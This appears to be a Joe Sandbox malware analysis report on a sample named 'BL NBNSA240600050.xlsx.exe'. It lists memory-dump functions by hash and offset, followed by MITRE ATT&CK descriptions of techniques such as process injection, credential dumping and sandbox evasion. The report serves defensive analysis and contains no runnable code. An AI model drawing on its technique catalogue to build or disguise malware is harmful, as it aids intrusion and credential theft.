Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db9a841cb590cecd12fe180001adffedef8446f35b6fbba6b95b173a03ac91f4
Instruction ID: 657f0e1ee2330318debb9db6d4bb8a48022956e1557bf4ffdb4570d87d5ce9ac
Opcode Fuzzy Hash: db9a841cb590cecd12fe180001adffedef8446f35b6fbba6b95b173a03ac91f4
Instruction Fuzzy Hash: 06319C30E102059FCB19CFA5D9946AEB7B2EF89300F208929E906E7750DB71ED46CB50

Function 06962088 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688f65b5cf5ff759ceed75b7f1be57599eb171e3d773ff65fcdca625646e5183
Instruction ID: f76d7d891c6ab14fffe1f4a2ffe0f87aa4f652aadb78e019152f0864bd76ece8
Opcode Fuzzy Hash: 688f65b5cf5ff759ceed75b7f1be57599eb171e3d773ff65fcdca625646e5183
Instruction Fuzzy Hash: 4731AC30E102059BCB19CF65D89469EB7B6EF89300F20C929E906E7750DB31ED42CB50

Function 06963E68 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d78579bfb685ec1597b80826c10c311323f9976e97b9930469967f705d87ce85
Instruction ID: aa8b6d089b1f2a820473ec2be35480eb45eb82d56f6a31eea9ec784c9796a5c7
Opcode Fuzzy Hash: d78579bfb685ec1597b80826c10c311323f9976e97b9930469967f705d87ce85
Instruction Fuzzy Hash: DC213975F016169FDB50DFAAD980BAEBBF5FB48610F10942AE905E7354E730DC408B90

Function 06963E58 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da84f217eb4c4067ddd1d598a0d1dec2b055f416b06836bb0e0f2fd605264ad9
Instruction ID: 22b2df4d46bc8eac75106f3763a676fb81df8a85f137edfdd457db25e8889617
Opcode Fuzzy Hash: da84f217eb4c4067ddd1d598a0d1dec2b055f416b06836bb0e0f2fd605264ad9
Instruction Fuzzy Hash: 20215775E006059FDB40DFA9E940BAEBBF5EF48210F10942AE946E7354E730DC408B90

Function 00F5D005 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4112977587.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f5d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d02d6af4a4c5072a8c40ddccb98fb19fc17e91fbe600df131b2fa096a10162
Instruction ID: dbf1b7cc0a03af087e5f47faaa54644e7b32093f3d0aede9990807dc13987b16
Opcode Fuzzy Hash: f3d02d6af4a4c5072a8c40ddccb98fb19fc17e91fbe600df131b2fa096a10162
Instruction Fuzzy Hash: F3215E7150E3C09FC713CB24D994711BF71AB46214F29C5DBD9858F2A7C23A980ADB62

Function 00F5D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4112977587.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f5d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65823b03e118ff0cb55ffa77abbc76d6cc6ab9d27e6e7997a7c1c0f54d9aedeb
Instruction ID: 75ef083952cdbf809fbb6010f78d50d0ad5f97e55a4cb88e93c81aa527711d70
Opcode Fuzzy Hash: 65823b03e118ff0cb55ffa77abbc76d6cc6ab9d27e6e7997a7c1c0f54d9aedeb
Instruction Fuzzy Hash: AF210471505204DFDB24DF14D9C0B26BBA5FB84325F24C56DDE0A4B39AC33AD84BDA62

Function 06966C90 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f105dc90df1ac9a1d1b271c6b1ae60c08403c215f56b89f03670528f0dd8cc20
Instruction ID: 61727b2ec329b85b82602d31a6ffc7e789c7c6fb6833030b5ccba54eebca0cc7
Opcode Fuzzy Hash: f105dc90df1ac9a1d1b271c6b1ae60c08403c215f56b89f03670528f0dd8cc20
Instruction Fuzzy Hash: 5421A230B102199FDF54DB6AE95079DB7FAEB84350F20842AF405EB754DB34EC418B81

Function 069641B1 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c7c72d0c12f2996aa49dc3722969123e7a47d3a6cece713cd2d8073c578ba0
Instruction ID: 776ea47d7d0aa2a8ebc13f421eeea77a81772cf25709dc8c0163d9246c833223
Opcode Fuzzy Hash: 47c7c72d0c12f2996aa49dc3722969123e7a47d3a6cece713cd2d8073c578ba0
Instruction Fuzzy Hash: 7311D2347006104FDB659AAED85471AB7EADF89B50F30C83AF54AC7754EA26DC034391

Function 06963F78 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f3567967b6354615a7b5ab43f891144463a1cd2f16f4b9e0fdb6be05c1ffc1
Instruction ID: b0b46d5077f0b6f8e38b2e83016fc3c36a25fd70035393baaf11373e7cc99df1
Opcode Fuzzy Hash: 99f3567967b6354615a7b5ab43f891144463a1cd2f16f4b9e0fdb6be05c1ffc1
Instruction Fuzzy Hash: 9C11A135B005244FDF549A79D8186AF73FAEBC8650F104539E40AE7398EE65DC018BE0

Function 0696F118 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc7027e950cb5108825d444d1a550f7b32c82d0d71c80bfa171bd39329eeaf7
Instruction ID: 746f5d0f879f65551c84a76a22e9a4159da2c4797c8b8dbd8075a43164982a39
Opcode Fuzzy Hash: 2cc7027e950cb5108825d444d1a550f7b32c82d0d71c80bfa171bd39329eeaf7
Instruction Fuzzy Hash: EF01B571B142004FDB659A7DE85172A77EBDBC6760F21882AF109C7345DA25DC068391

Function 06963C30 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e1b4f48aec753ad082da792235eb560433057b75c235a1ff678173f511d0a29
Instruction ID: 655400d41069087059aef1ffbf756ae9902359a685f4b11b57cd89d3a11637c0
Opcode Fuzzy Hash: 9e1b4f48aec753ad082da792235eb560433057b75c235a1ff678173f511d0a29
Instruction Fuzzy Hash: 2F21C4B5D01219AFCB10DF9AD985ADEFBB8FB48310F10812AE918A7340D374A954CFE5

Function 06963F67 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bb1611dacaee7ec176a32c6733215d0d665b7af39b9496e33bd28689e82f041
Instruction ID: a9942421eabacf91162b78e022c6b0c47fdd0e7508b8b205c398b3d404bc49fe
Opcode Fuzzy Hash: 7bb1611dacaee7ec176a32c6733215d0d665b7af39b9496e33bd28689e82f041
Instruction Fuzzy Hash: 5301B136F005155FDF649A69DC18AABB7FEEB88610F000439E507E3344EE249C018BE1

Function 06963C38 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53e36caa4953813d41e38859d86ab0137cb3fa4e62352159294ff674031525c
Instruction ID: 054e66af619d5a97f12339dfd7af83f30c71d49917c6f9a81ea1a06f21e1049a
Opcode Fuzzy Hash: a53e36caa4953813d41e38859d86ab0137cb3fa4e62352159294ff674031525c
Instruction Fuzzy Hash: C311D3B1D01219AFCB00DF9AD984ACEFBB4FB48310F10812AE918A7340C374A554CFA5

Function 0696A27A Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5022568ca92b8366d00d0872ca3664e3fac15258de3b095547e6d1b12c3425af
Instruction ID: 07098fd2d38a5ad721dde4eb093821802f3850c60750487ef02443e0fe6026f7
Opcode Fuzzy Hash: 5022568ca92b8366d00d0872ca3664e3fac15258de3b095547e6d1b12c3425af
Instruction Fuzzy Hash: BD01B130B002054FDB659F79D45076AB3E5EB86710F20886AE50ADB354EA22DC028780

Function 069641C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f41c7e0d508b3825a376c4d54955104b05cf254bcd02245a4f0fabafcfb6c0
Instruction ID: 720aa0d93e0fd16c3e4302254e1243e5b7fbba5a539a3e5a71e78d632045ecf5
Opcode Fuzzy Hash: 62f41c7e0d508b3825a376c4d54955104b05cf254bcd02245a4f0fabafcfb6c0
Instruction Fuzzy Hash: 8F016D31B001100BDB649AEEA95472AB3DEDBC9B20F30C83AF60AC7744EA66DC024391

Function 0696F128 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bddb0a0862535518a35547cb4d9b8799ff8e0b3dd7d5084750cf26e55203a171
Instruction ID: 2b1893aaeaf4edd7a04cf8cd48de7ca3133cfadc54f6ffc17368ccad7479fe75
Opcode Fuzzy Hash: bddb0a0862535518a35547cb4d9b8799ff8e0b3dd7d5084750cf26e55203a171
Instruction Fuzzy Hash: 6C018171B101100BDB65997DE85072E73DBDBC97A0F218839F50AC7344EA66DC034391

Function 0696A288 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d88f2408b6963e7d8eaa5774260f871d0b1b604d92540a66d7334b1033ff3b
Instruction ID: 57f9ab17d688bb72ba189dc2192a3fb24eea539b03c4406f59ebb8d097e13ac3
Opcode Fuzzy Hash: d7d88f2408b6963e7d8eaa5774260f871d0b1b604d92540a66d7334b1033ff3b
Instruction Fuzzy Hash: E401A430B001144FDB64EE7ED450B2AB3DAEB89714F208839F50AEB354EE22EC028790

Function 069663E0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93f566fd4226c7d6e1121850bb8204863e2072caed7a44e4bc620ea510568479
Instruction ID: e3bf2b6e77a4879ad66b5455987d1358743b1714c76549b6cea4b2ef5495b401
Opcode Fuzzy Hash: 93f566fd4226c7d6e1121850bb8204863e2072caed7a44e4bc620ea510568479
Instruction Fuzzy Hash: F5F037709183489BCB61CF79C95465A7BACDF07204F6148E6D4C5CB202E672C906C753

Non-executed Functions

Function 06967618 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$kq, xrefs: 06967758
$kq, xrefs: 06967BCA
$kq, xrefs: 06967BB4
$kq, xrefs: 0696777D
$kq, xrefs: 0696774C
$kq, xrefs: 06967B15
$kq, xrefs: 06967B09
$kq, xrefs: 06967BBE
$kq, xrefs: 06967789
$kq, xrefs: 06967BA8

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1324371161
Opcode ID: 7c68fdf140f198933a199800939ecf3a41f067efc07bf8d48ea0aa5bcf24377d
Instruction ID: 663902fb3c52d17774b71c7185d8f74a2ea8550fd677068c92188c0c30822351
Opcode Fuzzy Hash: 7c68fdf140f198933a199800939ecf3a41f067efc07bf8d48ea0aa5bcf24377d
Instruction Fuzzy Hash: 3B123E30A103198FDB64DFA5C9546AEB7B6FF84304F208569E40AAB764DB349D85CF90

Function 0696A8A8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$kq, xrefs: 0696A9AA
$kq, xrefs: 0696AA66
$kq, xrefs: 0696AA5A
$kq, xrefs: 0696AA24
$kq, xrefs: 0696AA05
$kq, xrefs: 0696A99E
$kq, xrefs: 0696A9F9
$kq, xrefs: 0696AA30

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1078448309
Opcode ID: a8758b5da4e68f03aeb34380efa05299945913005a060915fcc5e1c4f1fa9c2d
Instruction ID: 53d947b435506bc57b80485e7fda7484b2695b9ad8b855eba0f04d0377141e55
Opcode Fuzzy Hash: a8758b5da4e68f03aeb34380efa05299945913005a060915fcc5e1c4f1fa9c2d
Instruction Fuzzy Hash: CE916E30A10309DFDB68EF66DA54B6EB7B6FF84314F208529E402A7794DB799C41CB90

Function 06967018 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

$kq, xrefs: 06967360
$kq, xrefs: 06967520
$kq, xrefs: 06967354
$kq, xrefs: 0696752C
$kq, xrefs: 069672FA
$kq, xrefs: 069674B4

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: c1c692f593843bf8f2e5d7a982495fc9f63025350c8a7c5a7920156936c2d100
Instruction ID: 8d0882d24b1865f9925ce4df95d0f75f7c11c67a5dff2b54c5ddab032b185878
Opcode Fuzzy Hash: c1c692f593843bf8f2e5d7a982495fc9f63025350c8a7c5a7920156936c2d100
Instruction Fuzzy Hash: 3EF14A34A00309CFDB58EFA5D554A6EB7B6BF84304F648469E405DB768DB35EC86CB80

Function 06968350 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$kq, xrefs: 0696861B
$kq, xrefs: 0696860F
$kq, xrefs: 069685B6
$kq, xrefs: 069685AA

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: c1012d5c28f0b95342e643549ceed5bec0e09ee6b0f4fe2c712a2bbbb74d0460
Instruction ID: f0a1b81db2b348a4e8dfc76aad013f8e0bdb38d037b0e0f756e60fad57bbd0e0
Opcode Fuzzy Hash: c1012d5c28f0b95342e643549ceed5bec0e09ee6b0f4fe2c712a2bbbb74d0460
Instruction Fuzzy Hash: 92B15D30B102098FDB64EF69D65466EB7B6EF84300F248829E405DB799DB75DC82CB90

Function 0696AC30 Relevance: 5.2, Strings: 4, Instructions: 171COMMON

Download Yara Rule

Strings

$kq, xrefs: 0696ADE3
$kq, xrefs: 0696AD61
$kq, xrefs: 0696ADB4
$kq, xrefs: 0696AE0C

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: d2719a98e0089bab439cbde4dca3084e856470eeb79238c1ce11cb255ba04cf1
Instruction ID: 843e2fbadf9ee9d4c90c2e3dce59051c23590d45908180e5805085248ad11289
Opcode Fuzzy Hash: d2719a98e0089bab439cbde4dca3084e856470eeb79238c1ce11cb255ba04cf1
Instruction Fuzzy Hash: 39518030E103059FDF65DB69D9906AEB7B6EF84301F24892AE806E7B54DB35EC41CB90

Function 06968768 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LRkq, xrefs: 0696885B
LRkq, xrefs: 069688AA
$kq, xrefs: 069687F3
$kq, xrefs: 069687E7

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: LRkq$LRkq$$kq$$kq
API String ID: 0-2392252538
Opcode ID: 032ce3283fb5c9a1524d8a22e96620d3e4cb59b17a0c6a91a4488cfca651d879
Instruction ID: 1b89e92f1005f6b3a572063a8cb089dcbda6cea95e77dc32269e5e46315ee30e
Opcode Fuzzy Hash: 032ce3283fb5c9a1524d8a22e96620d3e4cb59b17a0c6a91a4488cfca651d879
Instruction Fuzzy Hash: 4051A630B003059FDB58EB69DA44B6AB7B6FF88304F148569E415DB7A9DB34EC41CBA0

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BL NBNSA240600050.xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

